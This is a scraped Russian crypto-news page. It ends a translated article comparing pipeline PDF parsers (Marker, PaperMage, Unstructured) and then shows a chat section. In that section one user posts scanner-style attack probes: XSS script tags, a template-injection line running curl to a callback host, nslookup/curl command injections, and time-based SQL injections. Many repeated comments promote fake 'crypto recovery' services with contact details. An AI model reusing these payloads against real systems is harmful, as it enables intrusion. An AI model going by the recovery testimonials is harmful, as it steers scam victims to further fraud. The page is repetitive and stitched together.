Поэтому, разрабатывая собственные инструменты для парсинга PDF, мы должны стремиться сохранить как можно больше полезной промежуточной информации и метаданных.

Об обнаружении и распознавании таблиц

Для обнаружения и распознавания таблиц во фреймворке unstructured используется Table Transformer.

Модель Table Transformer была предложена в статье PubTables-1M: Towards comprehensive table extraction from unstructured documents. В этой статье представлен новый набор данных PubTables-1M, предназначенный для извлечения таблиц из неструктурированных документов и проведения распознавания структуры и функционального анализа таблиц, как показано на рисунке 12.

Рисунок 12: Иллюстрация трех подзадач извлечения таблиц, рассматриваемых в наборе данных PubTables-1M. Источник: PubTables-1M: Towards comprehensive table extraction from unstructured document.

Table Transformer обучен на наборе данных PubTables-1M, основанном на модели DETR, для решения таких задач, как обнаружение таблиц и распознавание их структуры.

Больше информации про обработку таблиц вы найдете в моей предыдущей статье.

Об обнаружении и распознавании формул

Во фреймворке unstructured отсутствует специальный модуль для обнаружения и распознавания формул, что в принципе заметно по посредственным результатам, показанным на рисунке 13.

Рисунок 13: Слева показан результат парсинга абзаца на 6-й странице статьи BERT, включая формулу, выделенную красной рамкой. Справа показан оригинал статьи. Скриншот автора.

Заключение

В этой статье представлен обзор конвейерного подхода к парсингу PDF-файлов. В ней рассматривается этот подход на примере трех фреймворков, использующих этот метод, дается его подробное представление и излагаются выводы, сделанные на его основе.

В итоге,

Хотя у Marker есть несколько недостатков, это легкий и быстрый инструмент.
Хотя PaperMage в первую очередь предназначен для работы с научными документами, его исключительная масштабируемость служит хорошей отправной точкой для дальнейшего развития.
Unstructured — это комплексный конвейерный фреймворк для парсинга PDF. Его преимущества заключаются в детальном анализе макета и широких возможностях кастомизации.

В целом, конвейерный подход к парсингу PDF-файлов является легко интерпретируемым и настраиваемым, что делает его широко используемым методом. Однако его эффективность во многом зависит от производительности каждой модели или алгоритма, используемого в процессе. Поэтому обучающие данные и структура каждой модели должны быть тщательно продуманы.

Материал подготовлен в рамках практического онлайн-курса "MLOps".

Источник

Теги

Категория

Новости

Дата

14 авг. 2024 г.

09.10.25 08:09 pHqghUme

can I ask you a question please?
09.10.25 08:09 pHqghUme

is it ok if I upload an image?
09.10.25 08:09 pHqghUme

is it ok if I upload an image?
09.10.25 08:09 pHqghUme

e
09.10.25 08:11 pHqghUme

e
09.10.25 08:11 pHqghUme

e
09.10.25 08:11 pHqghUme

e
09.10.25 08:11 pHqghUme

can I ask you a question please?
09.10.25 08:12 pHqghUme

can I ask you a question please?
09.10.25 08:12 pHqghUme

can I ask you a question please?
09.10.25 08:12 pHqghUme

is it ok if I upload an image?
09.10.25 08:13 pHqghUme

can I ask you a question please?'"()&%<zzz><ScRiPt >6BEP(9887)</ScRiPt>
09.10.25 08:13 pHqghUme

{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hityjalvnplljd6041.bxss.me")}}
09.10.25 08:13 pHqghUme

'"()&%<zzz><ScRiPt >6BEP(9632)</ScRiPt>
09.10.25 08:13 pHqghUme

can I ask you a question please?9425407
09.10.25 08:13 pHqghUme

is it ok if I upload an image?
09.10.25 08:14 pHqghUme

is it ok if I upload an image?
09.10.25 08:16 pHqghUme

e
09.10.25 08:17 pHqghUme

e
09.10.25 08:17 pHqghUme

e
09.10.25 08:17 pHqghUme

"+response.write(9043995*9352716)+"
09.10.25 08:17 pHqghUme

can I ask you a question please?
09.10.25 08:17 pHqghUme

can I ask you a question please?
09.10.25 08:17 pHqghUme

can I ask you a question please?
09.10.25 08:18 pHqghUme

can I ask you a question please?
09.10.25 08:18 pHqghUme

$(nslookup -q=cname hitconyljxgbe60e2b.bxss.me||curl hitconyljxgbe60e2b.bxss.me)
09.10.25 08:18 pHqghUme

is it ok if I upload an image?
09.10.25 08:18 pHqghUme

is it ok if I upload an image?
09.10.25 08:18 pHqghUme

|(nslookup -q=cname hitrwbjjcbfsjdad83.bxss.me||curl hitrwbjjcbfsjdad83.bxss.me)
09.10.25 08:18 pHqghUme

|(nslookup${IFS}-q${IFS}cname${IFS}hitmawkdrqdgobcdfd.bxss.me||curl${IFS}hitmawkdrqdgobcdfd.bxss.me)
09.10.25 08:18 pHqghUme

is it ok if I upload an image?
09.10.25 08:19 pHqghUme

is it ok if I upload an image?
09.10.25 08:20 pHqghUme

e
09.10.25 08:20 pHqghUme

e
09.10.25 08:21 pHqghUme

e
09.10.25 08:21 pHqghUme

e
09.10.25 08:21 pHqghUme

can I ask you a question please?
09.10.25 08:22 pHqghUme

can I ask you a question please?
09.10.25 08:22 pHqghUme

can I ask you a question please?
09.10.25 08:22 pHqghUme

is it ok if I upload an image?
09.10.25 08:22 pHqghUme

if(now()=sysdate(),sleep(15),0)
09.10.25 08:22 pHqghUme

can I ask you a question please?0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
09.10.25 08:23 pHqghUme

can I ask you a question please?0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
09.10.25 08:23 pHqghUme

can I ask you a question please?
09.10.25 08:23 pHqghUme

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
09.10.25 08:24 pHqghUme

is it ok if I upload an image?
09.10.25 08:24 pHqghUme

e
09.10.25 08:24 pHqghUme

can I ask you a question please?-1 waitfor delay '0:0:15' --
09.10.25 08:25 pHqghUme

is it ok if I upload an image?
09.10.25 08:25 pHqghUme

e
09.10.25 08:25 pHqghUme

e
09.10.25 08:25 pHqghUme

e
09.10.25 08:25 pHqghUme

can I ask you a question please?9IDOn7ik'; waitfor delay '0:0:15' --
09.10.25 08:26 pHqghUme

can I ask you a question please?MQOVJH7P' OR 921=(SELECT 921 FROM PG_SLEEP(15))--
09.10.25 08:26 pHqghUme

e
09.10.25 08:27 pHqghUme

can I ask you a question please?64e1xqge') OR 107=(SELECT 107 FROM PG_SLEEP(15))--
09.10.25 08:27 pHqghUme

can I ask you a question please?ODDe7Ze5')) OR 82=(SELECT 82 FROM PG_SLEEP(15))--
09.10.25 08:28 pHqghUme

can I ask you a question please?'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
09.10.25 08:28 pHqghUme

can I ask you a question please?'"
09.10.25 08:28 pHqghUme

can I ask you a question please?
09.10.25 08:28 pHqghUme

@@olQP6
09.10.25 08:28 pHqghUme

(select 198766*667891 from DUAL)
09.10.25 08:28 pHqghUme

(select 198766*667891)
09.10.25 08:30 pHqghUme

is it ok if I upload an image?
09.10.25 08:33 pHqghUme

can I ask you a question please?
09.10.25 08:34 pHqghUme

can I ask you a question please?
09.10.25 08:34 pHqghUme

if(now()=sysdate(),sleep(15),0)
09.10.25 08:35 pHqghUme

e
09.10.25 08:36 pHqghUme

is it ok if I upload an image?
09.10.25 08:36 pHqghUme

is it ok if I upload an image?
09.10.25 08:37 pHqghUme

is it ok if I upload an image?
09.10.25 08:37 pHqghUme

is it ok if I upload an image?
09.10.25 08:37 pHqghUme

e
09.10.25 08:37 pHqghUme

e
09.10.25 08:40 pHqghUme

can I ask you a question please?
09.10.25 08:40 pHqghUme

is it ok if I upload an image?
09.10.25 08:41 pHqghUme

e
09.10.25 08:41 pHqghUme

can I ask you a question please?
09.10.25 08:42 pHqghUme

can I ask you a question please?
09.10.25 08:42 pHqghUme

is it ok if I upload an image?
09.10.25 08:42 pHqghUme

e
09.10.25 11:05 marcushenderson624

Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1
09.10.25 11:05 marcushenderson624

Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1
09.10.25 11:05 marcushenderson624

Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1
09.10.25 11:05 marcushenderson624

Bitcoin Recovery Testimonial After falling victim to a cryptocurrency scam group, I lost $354,000 worth of USDT. I thought all hope was lost from the experience of losing my hard-earned money to scammers. I was devastated and believed there was no way to recover my funds. Fortunately, I started searching for help to recover my stolen funds and I came across a lot of testimonials online about Capital Crypto Recovery, an agent who helps in recovery of lost bitcoin funds, I contacted Capital Crypto Recover Service, and with their expertise, they successfully traced and recovered my stolen assets. Their team was professional, kept me updated throughout the process, and demonstrated a deep understanding of blockchain transactions and recovery protocols. They are trusted and very reliable with a 100% successful rate record Recovery bitcoin, I’m grateful for their help and highly recommend their services to anyone seeking assistance with lost crypto. Contact: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Email: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1
11.10.25 04:41 luciajessy3

Don’t be deceived by different testimonies online that is most likely wrong. I have made use of several recovery options that got me disappointed at the end of the day but I must confess that the tech genius I eventually found is the best out here. It’s better you devise your time to find the valid professional that can help you recover your stolen or lost crypto such as bitcoins rather than falling victim of other amateur hackers that cannot get the job done. ADAMWILSON . TRADING @ CONSULTANT COM / WHATSAPP ; +1 (603) 702 ( 4335 ) is the most reliable and authentic blockchain tech expert you can work with to recover what you lost to scammers. They helped me get back on my feet and I’m very grateful for that. Contact their email today to recover your lost coins ASAP…
11.10.25 10:44 Tonerdomark

A thief took my Dogecoin and wrecked my life. Then Mr. Sylvester stepped in and changed everything. He got back €211,000 for me, every single cent of my gains. His calm confidence and strong tech skills rebuilt my trust. Thanks to him, I recovered my cash with no issues. After months of stress, I felt huge relief. I had full faith in him. If a scam stole your money, reach out to him today at { yt7cracker@gmail . com } His help sparked my full turnaround.
12.10.25 01:12 harristhomas7376

"In the crypto world, this is great news I want to share. Last year, I fell victim to a scam disguised as a safe investment option. I have invested in crypto trading platforms for about 10yrs thinking I was ensuring myself a retirement income, only to find that all my assets were either frozen, I believed my assets were secure — until I discovered that my BTC funds had been frozen and withdrawals were impossible. It was a devastating moment when I realized I had been scammed, and I thought my Bitcoin was gone forever, Everything changed when a close friend recommended the Capital Crypto Recover Service. Their professionalism, expertise, and dedication enabled me to recover my lost Bitcoin funds back — more than €560.000 DEM to my BTC wallet. What once felt impossible became a reality thanks to their support. If you have lost Bitcoin through scams, hacking, failed withdrawals, or similar challenges, don’t lose hope. I strongly recommend Capital Crypto Recover Service to anyone seeking a reliable and effective solution for recovering any wallet assets. They have a proven track record of successful reputation in recovering lost password assets for their clients and can help you navigate the process of recovering your funds. Don’t let scammers get away with your hard-earned money – contact Email: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Contact: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1
12.10.25 01:12 harristhomas7376

"In the crypto world, this is great news I want to share. Last year, I fell victim to a scam disguised as a safe investment option. I have invested in crypto trading platforms for about 10yrs thinking I was ensuring myself a retirement income, only to find that all my assets were either frozen, I believed my assets were secure — until I discovered that my BTC funds had been frozen and withdrawals were impossible. It was a devastating moment when I realized I had been scammed, and I thought my Bitcoin was gone forever, Everything changed when a close friend recommended the Capital Crypto Recover Service. Their professionalism, expertise, and dedication enabled me to recover my lost Bitcoin funds back — more than €560.000 DEM to my BTC wallet. What once felt impossible became a reality thanks to their support. If you have lost Bitcoin through scams, hacking, failed withdrawals, or similar challenges, don’t lose hope. I strongly recommend Capital Crypto Recover Service to anyone seeking a reliable and effective solution for recovering any wallet assets. They have a proven track record of successful reputation in recovering lost password assets for their clients and can help you navigate the process of recovering your funds. Don’t let scammers get away with your hard-earned money – contact Email: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Contact: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1
12.10.25 19:53 Tonerdomark

A crook swiped my Dogecoin. It ruined my whole world. Then Mr. Sylvester showed up. He fixed it all. He pulled back €211,000 for me. Not one cent missing from my profits. His steady cool and sharp tech know-how won back my trust. I got my money smooth and sound. After endless worry, relief hit me hard. I trusted him completely. Lost cash to a scam? Hit him up now at { yt7cracker@gmail . com }. His aid turned my life around. WhatsApp at +1 512 577 7957.
12.10.25 21:36 blessing

Writing this review is a joy. Marie has provided excellent service ever since I started working with her in early 2018. I was worried I wouldn't be able to get my coins back after they were stolen by hackers. I had no idea where to begin, therefore it was a nightmare for me. However, things became easier for me after my friend sent me to [email protected] and +1 7127594675 on WhatsApp. I'm happy that she was able to retrieve my bitcoin so that I could resume trading.
13.10.25 01:11 elizabethrush89

God bless Capital Crypto Recover Services for the marvelous work you did in my life, I have learned the hard way that even the most sensible investors can fall victim to scams. When my USD was stolen, for anyone who has fallen victim to one of the bitcoin binary investment scams that are currently ongoing, I felt betrayal and upset. But then I was reading a post on site when I saw a testimony of Wendy Taylor online who recommended that Capital Crypto Recovery has helped her recover scammed funds within 24 hours. after reaching out to this cyber security firm that was able to help me recover my stolen digital assets and bitcoin. I’m genuinely blown away by their amazing service and professionalism. I never imagined I’d be able to get my money back until I complained to Capital Crypto Recovery Services about my difficulties and gave all of the necessary paperwork. I was astounded that it took them 12 hours to reclaim my stolen money back. Without a doubt, my USDT assets were successfully recovered from the scam platform, Thank you so much Sir, I strongly recommend Capital Crypto Recover for any of your bitcoin recovery, digital funds recovery, hacking, and cybersecurity concerns. You reach them Call/Text Number +1 (336)390-6684 His Email: [email protected] Contact Telegram: @Capitalcryptorecover Via Contact: [email protected] His website: https://recovercapital.wixsite.com/capital-crypto-rec-1
13.10.25 01:11 elizabethrush89

God bless Capital Crypto Recover Services for the marvelous work you did in my life, I have learned the hard way that even the most sensible investors can fall victim to scams. When my USD was stolen, for anyone who has fallen victim to one of the bitcoin binary investment scams that are currently ongoing, I felt betrayal and upset. But then I was reading a post on site when I saw a testimony of Wendy Taylor online who recommended that Capital Crypto Recovery has helped her recover scammed funds within 24 hours. after reaching out to this cyber security firm that was able to help me recover my stolen digital assets and bitcoin. I’m genuinely blown away by their amazing service and professionalism. I never imagined I’d be able to get my money back until I complained to Capital Crypto Recovery Services about my difficulties and gave all of the necessary paperwork. I was astounded that it took them 12 hours to reclaim my stolen money back. Without a doubt, my USDT assets were successfully recovered from the scam platform, Thank you so much Sir, I strongly recommend Capital Crypto Recover for any of your bitcoin recovery, digital funds recovery, hacking, and cybersecurity concerns. You reach them Call/Text Number +1 (336)390-6684 His Email: [email protected] Contact Telegram: @Capitalcryptorecover Via Contact: [email protected] His website: https://recovercapital.wixsite.com/capital-crypto-rec-1
14.10.25 01:15 tyleradams

Hi. Please be wise, do not make the same mistake I had made in the past, I was a victim of bitcoin scam, I saw a glamorous review showering praises and marketing an investment firm, I reached out to them on what their contracts are, and I invested $28,000, which I was promised to get my first 15% profit in weeks, when it’s time to get my profits, I got to know the company was bogus, they kept asking me to invest more and I ran out of patience then requested to have my money back, they refused to answer nor refund my funds, not until a friend of mine introduced me to the NVIDIA TECH HACKERS, so I reached out and after tabling my complaints, they were swift to action and within 36 hours I got back my funds with the due profit. I couldn’t contain the joy in me. I urge you guys to reach out to NVIDIA TECH HACKERS on their email: [email protected]
14.10.25 08:46 robertalfred175

CRYPTO SCAM RECOVERY SUCCESSFUL – A TESTIMONIAL OF LOST PASSWORD TO YOUR DIGITAL WALLET BACK. My name is Robert Alfred, Am from Australia. I’m sharing my experience in the hope that it helps others who have been victims of crypto scams. A few months ago, I fell victim to a fraudulent crypto investment scheme linked to a broker company. I had invested heavily during a time when Bitcoin prices were rising, thinking it was a good opportunity. Unfortunately, I was scammed out of $120,000 AUD and the broker denied me access to my digital wallet and assets. It was a devastating experience that caused many sleepless nights. Crypto scams are increasingly common and often involve fake trading platforms, phishing attacks, and misleading investment opportunities. In my desperation, a friend from the crypto community recommended Capital Crypto Recovery Service, known for helping victims recover lost or stolen funds. After doing some research and reading multiple positive reviews, I reached out to Capital Crypto Recovery. I provided all the necessary information—wallet addresses, transaction history, and communication logs. Their expert team responded immediately and began investigating. Using advanced blockchain tracking techniques, they were able to trace the stolen Dogecoin, identify the scammer’s wallet, and coordinate with relevant authorities to freeze the funds before they could be moved. Incredibly, within 24 hours, Capital Crypto Recovery successfully recovered the majority of my stolen crypto assets. I was beyond relieved and truly grateful. Their professionalism, transparency, and constant communication throughout the process gave me hope during a very difficult time. If you’ve been a victim of a crypto scam, I highly recommend them with full confidence contacting: 📧 Email: [email protected] 📱 Telegram: @Capitalcryptorecover Contact: [email protected] 📞 Call/Text: +1 (336) 390-6684 🌐 Website: https://recovercapital.wixsite.com/capital-crypto-rec-1
14.10.25 08:46 robertalfred175

CRYPTO SCAM RECOVERY SUCCESSFUL – A TESTIMONIAL OF LOST PASSWORD TO YOUR DIGITAL WALLET BACK. My name is Robert Alfred, Am from Australia. I’m sharing my experience in the hope that it helps others who have been victims of crypto scams. A few months ago, I fell victim to a fraudulent crypto investment scheme linked to a broker company. I had invested heavily during a time when Bitcoin prices were rising, thinking it was a good opportunity. Unfortunately, I was scammed out of $120,000 AUD and the broker denied me access to my digital wallet and assets. It was a devastating experience that caused many sleepless nights. Crypto scams are increasingly common and often involve fake trading platforms, phishing attacks, and misleading investment opportunities. In my desperation, a friend from the crypto community recommended Capital Crypto Recovery Service, known for helping victims recover lost or stolen funds. After doing some research and reading multiple positive reviews, I reached out to Capital Crypto Recovery. I provided all the necessary information—wallet addresses, transaction history, and communication logs. Their expert team responded immediately and began investigating. Using advanced blockchain tracking techniques, they were able to trace the stolen Dogecoin, identify the scammer’s wallet, and coordinate with relevant authorities to freeze the funds before they could be moved. Incredibly, within 24 hours, Capital Crypto Recovery successfully recovered the majority of my stolen crypto assets. I was beyond relieved and truly grateful. Their professionalism, transparency, and constant communication throughout the process gave me hope during a very difficult time. If you’ve been a victim of a crypto scam, I highly recommend them with full confidence contacting: 📧 Email: [email protected] 📱 Telegram: @Capitalcryptorecover Contact: [email protected] 📞 Call/Text: +1 (336) 390-6684 🌐 Website: https://recovercapital.wixsite.com/capital-crypto-rec-1
14.10.25 08:46 robertalfred175

CRYPTO SCAM RECOVERY SUCCESSFUL – A TESTIMONIAL OF LOST PASSWORD TO YOUR DIGITAL WALLET BACK. My name is Robert Alfred, Am from Australia. I’m sharing my experience in the hope that it helps others who have been victims of crypto scams. A few months ago, I fell victim to a fraudulent crypto investment scheme linked to a broker company. I had invested heavily during a time when Bitcoin prices were rising, thinking it was a good opportunity. Unfortunately, I was scammed out of $120,000 AUD and the broker denied me access to my digital wallet and assets. It was a devastating experience that caused many sleepless nights. Crypto scams are increasingly common and often involve fake trading platforms, phishing attacks, and misleading investment opportunities. In my desperation, a friend from the crypto community recommended Capital Crypto Recovery Service, known for helping victims recover lost or stolen funds. After doing some research and reading multiple positive reviews, I reached out to Capital Crypto Recovery. I provided all the necessary information—wallet addresses, transaction history, and communication logs. Their expert team responded immediately and began investigating. Using advanced blockchain tracking techniques, they were able to trace the stolen Dogecoin, identify the scammer’s wallet, and coordinate with relevant authorities to freeze the funds before they could be moved. Incredibly, within 24 hours, Capital Crypto Recovery successfully recovered the majority of my stolen crypto assets. I was beyond relieved and truly grateful. Their professionalism, transparency, and constant communication throughout the process gave me hope during a very difficult time. If you’ve been a victim of a crypto scam, I highly recommend them with full confidence contacting: 📧 Email: [email protected] 📱 Telegram: @Capitalcryptorecover Contact: [email protected] 📞 Call/Text: +1 (336) 390-6684 🌐 Website: https://recovercapital.wixsite.com/capital-crypto-rec-1
15.10.25 18:07 crypto

Cryptocurrency's digital realm presents many opportunities, but it also conceals complex frauds. It is quite painful to lose your cryptocurrency to scam. You can feel harassed and lost as a result. If you have been the victim of a cryptocurrency scam, this guide explains what to do ASAP. Following these procedures will help you avoid further issues or get your money back. Communication with Marie ([email protected] and WhatsApp: +1 7127594675) can make all the difference.
15.10.25 21:52 harristhomas7376

"In the crypto world, this is great news I want to share. Last year, I fell victim to a scam disguised as a safe investment option. I have invested in crypto trading platforms for about 10yrs thinking I was ensuring myself a retirement income, only to find that all my assets were either frozen, I believed my assets were secure — until I discovered that my BTC funds had been frozen and withdrawals were impossible. It was a devastating moment when I realized I had been scammed, and I thought my Bitcoin was gone forever, Everything changed when a close friend recommended the Capital Crypto Recover Service. Their professionalism, expertise, and dedication enabled me to recover my lost Bitcoin funds back — more than €560.000 DEM to my BTC wallet. What once felt impossible became a reality thanks to their support. If you have lost Bitcoin through scams, hacking, failed withdrawals, or similar challenges, don’t lose hope. I strongly recommend Capital Crypto Recover Service to anyone seeking a reliable and effective solution for recovering any wallet assets. They have a proven track record of successful reputation in recovering lost password assets for their clients and can help you navigate the process of recovering your funds. Don’t let scammers get away with your hard-earned money – contact Email: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Contact: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1
15.10.25 21:52 harristhomas7376

"In the crypto world, this is great news I want to share. Last year, I fell victim to a scam disguised as a safe investment option. I have invested in crypto trading platforms for about 10yrs thinking I was ensuring myself a retirement income, only to find that all my assets were either frozen, I believed my assets were secure — until I discovered that my BTC funds had been frozen and withdrawals were impossible. It was a devastating moment when I realized I had been scammed, and I thought my Bitcoin was gone forever, Everything changed when a close friend recommended the Capital Crypto Recover Service. Their professionalism, expertise, and dedication enabled me to recover my lost Bitcoin funds back — more than €560.000 DEM to my BTC wallet. What once felt impossible became a reality thanks to their support. If you have lost Bitcoin through scams, hacking, failed withdrawals, or similar challenges, don’t lose hope. I strongly recommend Capital Crypto Recover Service to anyone seeking a reliable and effective solution for recovering any wallet assets. They have a proven track record of successful reputation in recovering lost password assets for their clients and can help you navigate the process of recovering your funds. Don’t let scammers get away with your hard-earned money – contact Email: [email protected] Phone CALL/Text Number: +1 (336) 390-6684 Contact: [email protected] Website: https://recovercapital.wixsite.com/capital-crypto-rec-1

Для участия в Чате вам необходим бесплатный аккаунт pro-blockchain.com Войти Регистрация

Н Новости

[Перевод] Демистифицируем парсинг PDF: конвейерная обработка

Обзор, способы реализации и выводы

Обзор

Marker

Общий процесс

Выводы по Marker’у

Недостатки Marker

PaperMage

Компоненты

Базовые классы данных

Общий анализ процесса и кода

Разбиение на предложения

Анализ структуры макета

Анализ логической структуры

Размышления и выводы о PaperMage

Unstructured

Об анализе макета

О кастомизации

Об обнаружении и распознавании таблиц

Об обнаружении и распознавании формул

Заключение

Похожие новости

Все главные новости мира криптовалют и технологий 16.10.2025

Аналитики Bitwise: за один квартал число компаний-держателей BTC выросло на 39%

Нейросети на все случаи жизни

Глава Резервного банка Индии призвал мир отказаться от стейблкоинов в пользу государственных цифровых валют

Когда одного агента мало: практический кейс применения мультиагентной системы

Розничные инвесторы увеличили покупки биткоина, киты сбавили продажи

Н Новости

[Перевод] Демистифицируем парсинг PDF: конвейерная обработка

Обзор, способы реализации и выводы

Обзор

Marker

Общий процесс

Выводы по Marker’у

Недостатки Marker

PaperMage

Компоненты

Базовые классы данных

Общий анализ процесса и кода

Разбиение на предложения

Анализ структуры макета

Анализ логической структуры

Размышления и выводы о PaperMage

Unstructured

Об анализе макета

О кастомизации

Об обнаружении и распознавании таблиц

Об обнаружении и распознавании формул

Заключение

Похожие новости

Все главные новости мира криптовалют и технологий 16.10.2025

Аналитики Bitwise: за один квартал число компаний-держателей BTC выросло на 39%

Нейросети на все случаи жизни

Глава Резервного банка Индии призвал мир отказаться от стейблкоинов в пользу государственных цифровых валют

Когда одного агента мало: практический кейс применения мультиагентной системы

Розничные инвесторы увеличили покупки биткоина, киты сбавили продажи

Оставайтесь на связи